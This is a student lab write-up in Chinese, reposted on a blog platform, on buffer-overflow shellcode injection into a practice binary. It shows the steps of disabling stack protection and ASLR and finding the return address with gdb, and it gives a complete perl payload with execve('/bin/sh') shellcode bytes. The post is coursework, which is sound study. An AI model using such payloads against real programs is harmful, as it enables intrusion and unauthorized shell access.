20145335郝昊《网络攻防》Bof逆向基础——ShellCode注入与执行

最新推荐文章于 2023-07-15 17:11:48 发布
最新推荐文章于 2023-07-15 17:11:48 发布
阅读量180 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/20145335hh/p/6539368.html
版权

20145335郝昊《网络攻防》Bof逆向基础——ShellCode注入与执行

实验原理

  • 关于ShellCode:ShellCode是一段代码,作为数据发送给受攻击服务器,是溢出程序和蠕虫病毒的核心,一般可以获取权限。我们将代码存储到对方的堆栈中,并将堆栈的返回地址利用缓冲区溢出漏洞,覆盖成为指向ShellCode的地址。

  • Linux中两种基本构造攻击buf:retaddr+nop+shellcodenop+shellcode+retaddr,缓冲区小就把shellcode放后面,若缓冲区较大把缓冲区放置前边。

实验目的与要求

  • 本次实践对象是一个名为pwn1的可执行文件。

  • 对可执行文件pwn1进行操作,注入并运行任意代码。

实验过程及结果

  • 写一段shellcode代码(本次实验采用老师的代码)
  • 设置环境,手动安装execstack
  • 拷贝并运行pwn1文件确保可以使用

884698-20170312211108748-876735854.png

  • 设置堆栈可执行
  • 关闭地址随机化,more/proc/sys/kernel/randomizevaspace用来查询地址随机化是否开启或者关闭的状态,2表示开启,0表示关闭。

884698-20170312211123982-228134009.png

  • 构造payload,采用nop+shellcode+retaddr方式(\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置,需要将它改为shellcode的地址)

884698-20170312211147998-754887993.png

  • 打开一个新的terminal,注入攻击注入攻击buf(注意回车要在设置断点后进行,否则无法确认进程号,并且要在gdb执行c前回车

884698-20170312211203764-540297336.png

-用GDB调试20145335hh1进程,找到进程3400,用attach追踪

884698-20170312211233014-1669937050.png

  • 启动gdb调试进程,设置断点,查看注入 buf的内存地址

  • 此时发现0x080484ae ret 就跳到我们覆盖的retaddr那个地方了

884698-20170312211252623-1931278512.png

  • 设置断点后,在另一个终端按下回车,并寻找返回地址,看到01020304表示返回地址的位置是0xffffd31c,shellcode就紧挨着这个地址,加四字节为0xffffd320

  • 退出gdb,按照anything+retaddr+nops+shellcode修改input_shellcode如下打印字母'H',完成实验。
    884698-20170312211340420-1984110718.png

心得体会

本次实验老师在课堂上也有讲到过,但是在自己实验过程中还是遇到问题,比如在最后一步输入命令的时候遇到了问题,在命令perl -e 'print "H" x 32;print "\x20\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode和命令(cat input_shellcode;cat) | ./20145335hh1时候两个shellcode输入错误,导致修改的是一段代码,注入又是另一段代码导致最后结果出现了问题,及时更正了过来完成了实验

转载于:https://www.cnblogs.com/20145335hh/p/6539368.html

weixin_30577801
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
信标对象文件(BOF),用于通过线程劫持进行远程进程注入-C/C++开发
05-27
信标对象文件(BOF),用于通过线程劫持进行远程进程注入,而不会产生远程线程。 cThreadHijack ___________.__ .______ ___ .__ __ __ ___ \ __ ___ / | | _________ ____ _____ __ | _ / | \ | __ | | __ | ____ ____ | | __ _ / ___ \ | | | | \ _ __ \ _ / __ \\ __ \ / __ /〜\ | | \ __ \ _ / ___ \ | | / / \ \ ___ | | | Y \ | \ / \ ___ / / __ \ _ / / _ / \ Y / | | | / __ \\ \ ___ | <\ ___> ____ | | ___ | / __ | \ ___> ____ / \ ____ | \ ___ | _ / | __ / \ __ | (____ / \ ___> __ | _ \ \ //
Linux32 shellcode实验实例
weixin_42582241的博客
11-19 1809
实验准备 vitualbox Ubuntu 实验一 shell.c代码: 编译shell.c并运行: 用gdb跟踪shell的运行,确定执行execve的系统功能调用号及其它寄存器的值: 反编译main函数: 反编译foo函数: 关键处设置断点: 反编译execve函数: 同样在call指令处设置断点: 此时可以看出,已到call指令执行处。 接下来进行si单步执行: 在此将进入内核的虚拟系统调用。 反汇编__kernel_vsyscall,设置断点,继续执行直到sysenter指令:
Shellcode的原理及编写
热门推荐
maotoula的专栏
01-19 6万+
1.shellcode原理
逆向BOF基础——注入shellcode执行&Return-to-libc
weixin_30856965的博客
03-10 364
逆向BOF基础——注入shellcode执行 准备阶段 下载安装execstack. 本次实验实验的shellcode是心远的文章中生成的代码,即\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\ 为减少实验难度,设置堆栈可执行,并关闭地址...
ShellCode的编写和利用
Hvnt3r的博客
03-06 1282
ShellCode的编写和利用 原文链接:https://hvnt3r.top/2018/10/Shell-code的编写和利用/ 在渗透测试和漏洞利用中,Shellcode是一个十分重要的部分,在二进制的安全研究中,Shellcode也充当着十分重要的角色,本文会记录我学习Shellcode的编写和利用原理。 在程序中嵌入Shellcode执行 首先拿一道十分简单的PWN题来演示程序是如何执行...
网络攻防技术-Lab5-shellcode编写实验(SEED Labs – Shellcode Development Lab)
fgdhf的博客
10-30 2313
网络攻防技术实验,实验环境、实验说明、实验代码见 Shellcode Development Lab。Task 2: Using Code Segment。网络攻防技术 Lab5 shellcode编写实验 SEED Labs – Shellcode Development Lab ​
缓冲区溢出及ShellCode实验
obestboy的专栏
04-28 998
一、实验代码#include &lt;windows.h&gt; #include &lt;string.h&gt; #include &lt;stdio.h&gt; int fun(char *cpybuf) { char buf[8]; strcpy(buf,cpybuf); return 0; } int main() { MessageBox(NULL,"B...
DIG:Dive into Graphs是用于图深度学习研究的交钥匙库。-Python开发
05-25
DIG:用于图深度学习研究的总库,刘萌*,罗有志*,王丽梅*,谢耀辰*,郝昊*,桂树瑞,赵旭,余海阳,张静屯,刘毅,严克强,宝拉·奥兹特金(Bora Oztekin),刘浩然(Haoran Liu),张璇,丛聪(Cong Fu)和姬水旺...
编写一个启动/bin/ls的shellcode(含VMware Tools安装)
南七行者的博客
12-06 1043
编写一个启动/bin/ls的shellcode一、学习过程二、学习结果(已踩完坑)三、扩展阅读 一、学习过程 1.ls.c的编写、编译即验证 (1) 编写ls.c #include <unistd.h> void foo() { char* name[2]; name[0] = "/bin/ls"; name[1] = NULL; execve(name[0], name, NULL); } int main(int argc, char* argv[]) {
shellcode编写
weixin_42539095的博客
11-23 317
开发框架 地址: https://github.com/TonyChen56/ShellCodeFrame 实现功能 弹出计算器 具体实现 (1)在这个框架中,利用b.work.cpp源文件中的GetProcAddressWithHash函数,通过传入WinExec 函数的hash值,就可以获取到WinExec函数的相对地址。 (2)定义函数指针 在a.start.cpp源文件ShellCodeEntry()函数中添加WinExec("calc.exe ", SW_SHOW); 将声明复制到api.h
通用shellcode的编写、调用 实验缓冲区溢出攻击(非远程)调用shellcode实例(一)
u013582514的专栏
11-29 4459
在阅读此篇文章时,请先确定已有一些计算机功底,其中包括计算机组成原理、寄存器功能、汇编语感。 正文开始: 实验环境:windows8.1,vs2010 相信不少人听说过缓冲区溢出攻击,这是当时黑客网络攻击很关键的一种攻击方式,直到现在很多黑客找到bug后进行的攻击行为还是基于它为原理,今天我给大家简单实验一下。 首先讲一下缓冲区溢出攻击如何实现,就要
Windows Shellcode开发[3]
weixin_41487541的博客
03-25 5330
0 前言及编写shellcode准备工作 在Windows Shellcode开发介绍的最后一部分,我们将编写一个简单的改变鼠标左右键的shellcode。我们需要用到两个函数:SwapMouseButton和ExitProcess函数。首先看一个两个函数的参数与返回值情况: SwapMouseButton只有一个BOOL类型参数,若参为TRUE则交换鼠标左右键,返回值非0; ExitProcess也只有一个参数,代表进程退出代码。 整理一下思路: 我们需要调用以上两个函数,在C++中体现
ShellCode原理以及编写
qq_18811919的博客
07-02 2754
0x0 ShellCode编写注意事原理 1)不能使用字符串的直接偏移 即使你在C/C++代码中定义一个全局变量,一个取值为“Hello world”的字符串,或直接把该字符串作为参数传递给某个函数。但是,编译器会把字符串放置在一个特定的Section中(如.rdata或.data)。 2)不能确定函数的地址(如printf) 在shellcode中,我们却不能以逸待劳了。因为我们无法确定包含所需函数的DLL文件是否已经加载到内存。受ASLR(地址空间布局随机化)机制的影响,系统不会每次都把DLL文件加载
20145231熊梓宏 《网络对抗》 Bof逆向基础.shellcode注入
weixin_30651273的博客
03-11 99
20145231网络对抗《逆向Bof基础shellcode注入 实验目的与要求 1.本次实践的对象是一个名为pwn1的linux可执行文件。 2.若该程序正常执行,则main函数会调用foo函数,foo函数会简单回显任何用户输入的字符串。 ●该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码...
shellcode基本知识(PWN)
最新发布
weixin_51758733的博客
07-15 733
shellcode基本知识(PWN)
PWN-shellcode
MuMuLee_的博客
09-26 1751
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。 题目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
编写shellcode注入至进程
挖树
10-18 4254
shellcode 维基百科: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。 被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcode。 …… Shellcode通常是以机器码形式编写的。 去掉修饰词,shellcode就是一段机器码。 关于shellcode如何...
shellcode的简介和编写
Yannie's Blog
12-06 3301
真的不得不说,刚把函数调用栈弄明白了,shellcode又不懂了。。。占坑。。。
使用C语言编写通用shellcode的程序
TYJJXSJ的专栏
01-29 2116
/*   使用C语言编写通用shellcode的程序   出处:internet   修改:Hume/冷雨飘心   测试:Win2K SP4 Local   */    #include    #include    #include    #define  DEBUG 1    //    //函数原型    //    void    
《网络攻击与防御》课程机考试题
A_dmin的博客
06-06 2659
一、利用Netwag或类似工具进行ARP欺骗攻击,并利用Wireshark捕获相关网络数据。 二、利用Netwag或类似工具进行DDOS攻击,并利用Wireshark捕获相关网络数据。 三、请编写一段Shellcode,并将实验过程及结果详细记录下来 四、利用Netwag或类似工具进行ICMP重定向攻击,并利用Wireshark捕获相关网络数据。 五、利用“台湾一号”宏病毒进行实验性攻击,并将实验过程及结果详细记录下来。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值